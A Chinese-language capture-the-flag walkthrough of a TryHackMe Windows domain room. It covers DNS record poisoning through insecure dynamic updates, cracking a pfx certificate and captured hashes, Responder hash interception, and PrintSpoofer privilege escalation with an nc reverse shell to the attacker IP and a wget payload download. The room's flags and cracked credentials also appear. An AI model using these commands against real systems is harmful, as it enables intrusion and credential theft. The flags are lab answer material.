端口扫描

SMB枚举了一下没东西,估计和上一台靶机不一样了

DNS

照常添加hosts,三个域名都要添加。

开了53端口,是一个域服务器。试着挖掘一下DNS记录

dig windcorp.thm any @10.10.202.0

flag1

THM{Allowing nonsecure dynamic updates is a significant security vulnerability because updates can be accepted from untrusted sources}

提示:允许不安全的动态更新是一个重大的安全漏洞,因为可以从不受信任的来源接受更新

虽然不知道在说什么

Web

主页进去右上角有一个登录界面

然而登录界面貌似有加密机制,不能直接爆破。扫一下目录,但是都扫出来的东西都没权限访问。这条路似乎走不通了。看看最后一个域名selfservice.dev.windcorp.thm的网站,提示正在建造,很有可能存在漏洞。

扫目录扫到一个backup目录,能够加载第一个证书,但是加密

pfx2john cert.pfx >hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash

破解出密码是ganteng。到此为止是自己能做出来的部分了,接下来的步骤是根本没学过。

拦截哈希Getshell

稍微去了解了一下pfx文件,简单来说就是有私钥和公钥证书,访问它需要私钥,也就是刚刚爆破出的东西。

要进行攻击我们要提取出公钥证书和私钥

openssl pkcs12 -in cert.pfx -nocerts -out private.pem -nodes
openssl pkcs12 -in cert.pfx -out public.pem -clcerts -nokeys

根据flag1中的提示,我们能够动态更新DNS记录。尝试

发现确实是替换了

然后攻击的思路就是,有一个在线用户会自动登录,我们拥有域名的私钥和公钥证书,于是可以使用DNS中毒,上面的步骤就是替换DNS的A记录为我们的kali攻击机地址(用于解析IPv4地址),来伪装拦截这个用户的哈希。

sudo cp private.pem public.pem /usr/share/responder/certs

先复制证书和私钥到responder的目录

sudo vim /etc/responder/Responder.conf

这房间打完记得改回来

sudo responder -I tun0

成功捕获哈希

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

爆破得到用户和密码

!Angelus25! (edwardle)

也许可以直接远程连接桌面,但是5985端口没开,用不了evil-winrm,但是开了3389,也可以用rpd来登录

想到了之前扫到的powershell界面还有selfservice可用户登录。发现可以在powershell界面登录

计算机名填fire,大概是因为这个域叫fire吧

flag2

THM{8a1d460dfe345f8edd09d45ae00e5c1c14d12c89}

提权

到C盘根目录发现脚本已经被删了(笑)。

whoami /all

发现我们有SeImpersonatePrivilege特权,可以用printspoofer来提权,和本博客的第六台靶机提权方式相似

开启一个本地服务器用户上传,发现在downloads文件里已经有nc了,那传个printspoofer就好

powershell -c wget "http://10.14.52.15/PrintSpoofer64.exe" -outfile "PrintSpoofer64.exe"

开启监听

.\PrintSpoofer64.exe -c "nc.exe 10.14.52.15 1234 -e cmd"

成功提权

flag3

THM{9a8b9f4f3af2bce68885106c1c8473ab85e0eda0}

除了printspoofer,也有用sweetpotato的,可以看到downloads目录下有,用处应该差不多

碎碎念

对于https,DNS,证书之类的考察比较多,收货挺大。对于DNS中毒的原理做了一些了解,这个房间的难点应该就在这。提权倒是老朋友了,顺便复习一下。